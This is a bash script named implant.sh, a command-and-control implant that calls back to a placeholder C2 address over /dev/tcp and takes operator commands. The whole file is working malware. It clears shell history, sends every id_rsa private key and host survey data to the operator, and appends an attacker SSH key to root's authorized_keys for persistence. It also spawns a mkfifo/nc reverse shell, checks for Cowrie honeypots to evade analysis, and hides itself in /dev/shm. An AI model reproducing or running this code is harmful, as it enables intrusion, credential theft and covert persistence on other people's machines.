implant.sh

1. #!/bin/bash
2. red='\e[31m'
3. lred='\e[91m'
4. green='\e[32m'
5. lgreen='\e[92m'
6. yellow='\e[33m'
7. lyellow='\e[93m'
8. blue='\e[34m'
9. lblue='\e[94m'
10. magenta='\e[35m'
11. lmagenta='\e[95m'
12. cyan='\e[36m'
13. lcyan='\e[96m'
14. grey='\e[90m'
15. lgrey='\e[37m'
16. white='\e[97m'
17. black='\e[30m'
18. ##)
19. #( bg
20. b_red='\e[41m'
21. b_lred='\e[101m'
22. b_green='\e[42m'
23. b_lgreen='\e[102m'
24. b_yellow='\e[43m'
25. b_lyellow='\e[103m'
26. b_blue='\e[44m'
27. b_lblue='\e[104m'
28. b_magenta='\e[45m'
29. b_lmagenta='\e[105m'
30. b_cyan='\e[46m'
31. b_lcyan='\e[106m'
32. b_grey='\e[100m'
33. b_lgrey='\e[47m'
34. b_white='\e[107m'
35. b_black='\e[40m'
36. ##)
37. #( special
38. reset='\e[0;0m'
39. bold='\e[01m'
40. italic='\e[03m'
41. underline='\e[04m'
42. inverse='\e[07m'
43. conceil='\e[08m'
44. crossedout='\e[09m'
45. bold_off='\e[22m'
46. italic_off='\e[23m'
47. underline_off='\e[24m'
48. inverse_off='\e[27m'
49. conceil_off='\e[28m'
50. crossedout_off='\e[29m'
51. unset HISTFILE
52.  
53. ready () {
54.   eval 'printf "${lgreen}Ready:\r\nEnter help to see menu:${reset} \r\n" >&3;'
55. }
56.  
57.  
58. while [ true ]; do
59.  
60.     arr[0]="C2_IP_ADDRESS_HERE"
61.         svr=${arr[0]}
62.  
63.         eval 'exec 3<>/dev/tcp/$svr/9001;'
64.         if [[ ! "$?" -eq 0 ]] ; then
65.             continue
66.         fi
67.  
68.     eval 'printf "${red}$(date)${reset}\r\n" >&3;'
69.  
70.     if [[ ! "$?" -eq 0 ]] ; then
71.             continue
72.         fi
73.         eval 'printf "${bold}Agent Name:${bold_off} $(md5sum /etc/passwd | cut -d '/' -f1)\r\n" >&3;'
74.     eval 'ready >&3;'
75.         if [[ ! "$?" -eq 0 ]] ; then
76.             continue
77.         fi
78.  
79.         while [ true ]; do
80.             eval "read msg_in <&3;"
81.  
82.                 if [[ ! "$?" -eq 0 ]] ; then
83.                     break
84.                 fi
85.  
86.                 if  [[ "$msg_in" =~ "ping" ]] ; then
87.                     eval 'printf "${green}succ %s${reset}\r\n" "${msg_in:5}" >&3;'
88.                         if [[ ! "$?" -eq 0 ]] ; then
89.                             break
90.                         fi
91.                         sleep 1
92.                         eval 'printf "${green}joined${reset}\r\n\r\n" >&3;'
93.             eval 'ready >&3;'
94.  
95.                         if [[ ! "$?" -eq 0 ]] ; then
96.                                 break
97.                         fi
98.             elif [[ "$msg_in" =~ "help" ]] ; then
99.             eval 'printf "${bold}Help Menu:${bold_off}\r\n${bold}ping${bold_off} [*] check connection\r\n${bold}date${bold_off} [*] print UTC date time + local device time\r\n${bold}survey${bold_off} [*] conduct host survey\r\n${bold}cronj${bold_off} [*] investigate cron jobs\r\n${bold}rsyslog${bold_off} [*] check for remote logging\r\n${bold}cgroup${bold_off} [*] see cgroups\r\n${bold}sshkey${bold_off} [*] store ssh pub key in /root/.ssh/\r\n${bold}ld${bold_off} [*] dir listing\r\n${bold}honeypot${bold_off} [*] check for cowrie honeypot\r\n${bold}help${bold_off} [*] display commands\r\n${bold}ps${bold_off} [*] process list tree\r\n${bold}netstat${bold_off} [*] view connections\r\n${bold}users${bold_off} [*] see logged on users\r\n${bold}shell${bold_off} [*] spawn remote shell\r\n${bold}traceroute${bold_off} [*] see path to remote machine\r\n${bold}exit${bold_off} [*] quit session\r\n\r\n" >&3;'
100.             eval 'ready >&3;'
101.  
102.         elif [[ "$msg_in" =~ "traceroute" ]] ; then
103.             eval 'printf "traceroute 8.8.8.8: $(traceroute 8.8.8.8 > /tmp/trace)\r\n" >&3;'
104.             sleep 3
105.             eval 'printf "getting data: $(cat /tmp/trace)\r\n" >&3;'
106.             rm /tmp/trace
107.             eval 'ready >&3;'
108.  
109.         elif [[ "$msg_in" =~ "shell" ]]; then
110.             eval 'printf "Start a listener on 9002:\r\n" >&3;'
111.             sleep 10
112.             eval '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 9002 >/tmp/f)'
113.             eval 'ready >&3;'
114.        
115.         elif [[ "$msg_in" =~ "date" ]]; then
116.             eval 'printf "${bold}Date/Time (local + utc):${bold_off}\r\n$(date; date -u)\r\n" >&3;'
117.  
118.         elif [[ "$msg_in" =~ "cronj" ]]; then
119.             eval 'printf "${bold}${green}cron tasks writable by user:${reset}\r\n$(find -L /etc/cron* /etc/anacron /var/spool/cron -writable 2>/dev/null)\r\n" >&3;'
120.             eval 'printf "${bold}${green}cron jobs:${reset}\r\n$(grep -ERv "^(#|$)" /etc/crontab /etc/cron.d/ /etc/anacrontab 2>/dev/null)\r\n" >&3;'
121.             eval 'printf "${bold}${green}can we read user crontabs:${reset}\r\n$(ls -la /var/spool/cron/crontabs/* 2>/dev/null || echo "permission denied")\r\n\n" >&3;'
122.  
123.         elif [[ "$msg_in" =~ "rsyslog" ]]; then
124.             eval 'printf "${bold}${green}checking rsyslog:${reset}\r\n$(cat /etc/rsyslog.conf | grep -v "^#" || echo "permission denied")\r\n" >&3;'
125.  
126.         elif [[ "$msg_in" =~ "ld" ]]; then
127.            eval 'printf "Dir: $(pwd)\r\n" >&3;'
128.            eval 'printf "Listing: $(ls -lartF)\r\n" >&3;'
129.            eval 'ready >&3;'
130.  
131.    
132.         elif [[ "$msg_in" =~ "users" ]]; then
133.             eval 'printf "Logged on users: $(w)\r\n" >&3;'
134.             eval 'ready >&3;'
135.  
136.         elif [[ "$msg_in" =~ "honeypot" ]]; then
137.             eval 'printf "${green}Starting honeypot checks:${reset}\r\n" >&3;'
138.             view=$(which cat)
139.  
140.             if [ "$($view /etc/hostname | grep srv04)" ]; then
141.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
142.                     exit 4
143.             else
144.                     eval 'printf "Hostname is NOT srv04\r\n" >&3;'
145.             fi
146.             look=$(which ls)
147.             if [ "$($look /home | grep 'phil' && $view /proc/version | grep "Debian 4.")" ]; then
148.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
149.                     exit 5
150.             else
151.                     eval 'printf "No phil user detected\r\n" >&3;'
152.             fi
153.             if [ "$(which file)" ]; then
154.                     eval 'printf "file command on the box\r\n" >&3;'
155.             else      
156.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
157.                     exit 6
158.             fi
159.             fake=$(ping -c 4 999.999.999.999 | grep "64 bytes" | cut -d " " -f1,2)
160.             if [ "$fake" ];then
161.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
162.                     exit 7
163.             else
164.                     eval 'printf "Fake internet not detected\r\n" >&3;'
165.                 eval 'printf "${green}Honey pot checks over, no cowrie hp detected${reset}\n\r" >&3;'
166.                 eval 'ready >&3;'
167.             fi
168.         elif [[ "$msg_in" =~ "ps" ]]; then
169.             eval 'printf "Process list: $(ps -ef 2>/dev/null)\r\n" >&3;'
170.             eval 'ready >&3;'
171.  
172.         elif [[ "$msg_in" =~ "netstat" ]]; then
173.             eval 'printf "Connections: $(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
174.             eval 'ready >&3;'
175.  
176.         elif [[ "$msg_in" =~ "cgroup" ]]; then
177.             eval 'printf "cgroup: $(systemd-cgls --no-pager 2>/dev/null)\r\n" >&3;'
178.             eval 'ready >&3;'
179.  
180.         elif [[ "$msg_in" =~ "sshkey" ]]; then
181.             perms=$(id | grep uid | cut -d ' ' -f1 | cut -d '=' -f2 | cut -d '(' -f1)
182.             if [ $perms -eq 0 ]; then
183.                 mkdir -p /root/.ssh 2>/dev/null
184.                 echo "SSH_KEY_HERE"  >> /root/.ssh/authorized_keys
185.                 eval 'printf "Sending authorized_keys file back: $(cat /root/.ssh/authorized_keys)\r\n" >&3;'
186.                 eval 'ready >&3;'
187.             else
188.                 eval 'printf "You are not root!! SSH Key not added\r\n" >&3;'
189.                 eval 'ready >&3;'
190.             fi
191.         elif [[ "$msg_in" =~ "survey" ]]; then
192.             eval 'printf "${bold}${green}public ip information:${reset}\n$(curl ipinfo.io 2>/dev/null; sleep 1)\r\n\n" >&3;'
193.             eval 'printf "${bold}${green}ip information:\n${reset}$(ip a | ifconfig)\r\n\n" >&3;'
194.             eval 'printf "${bold}${green}perms:\n${reset}$(id)\r\n\n" >&3;'
195.             eval 'printf "${bold}${green}suid binaries:\n${reset}$(find / -perm -u=s -type f 2>/dev/null)\r\n\n" >&3;'
196.  
197.             eval 'printf "${bold}${green}os, kernel:\n${reset}$(uname -a)\r\n\n" >&3;'
198.             eval 'printf "${bold}${green}crontab:\r\n${reset}$(crontab -l | grep -Ev "^#")\r\n\n" >&3;'
199.             eval 'printf "${bold}${green}ssh keys:\n${reset}$(find / -type f -name "id_rsa" 2>/dev/null -exec cat {} \;)\r\n\n" >&3;'
200.             eval 'printf "${bold}${green}connections:\n${reset}$(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
201.             eval 'printf "${bold}${green}process list:\n${reset}$(ps -ef 2>/dev/null)\r\n" >&3;'
202.             eval 'ready >&3;'
203.  
204.         elif [[ "$msg_in" =~ "exit" ]]; then
205.             eval 'printf "${bold}${red}implant exiting, goodbye${reset}\r\n" >&3;'
206.             exit 0
207.         elif [[ "$msg_in" =~ "hide" ]]; then
208.             eval 'printf "${bold}implant hiding, will call back shortly on the same port${reset}\r\n" >&3;'
209.             mv implant.sh /dev/shm
210.             sleep 5
211.             source /dev/shm/implant.sh || bash /dev/shm/implant.sh
212.             sleep 5
213.             rm /dev/shm/implant.sh
214.            
215.             exit 0
216.              
217.         else
218.             eval 'printf "${red}That is not a valid command:${reset}\r\n" >&3;'      
219.                 fi
220.         done
221. done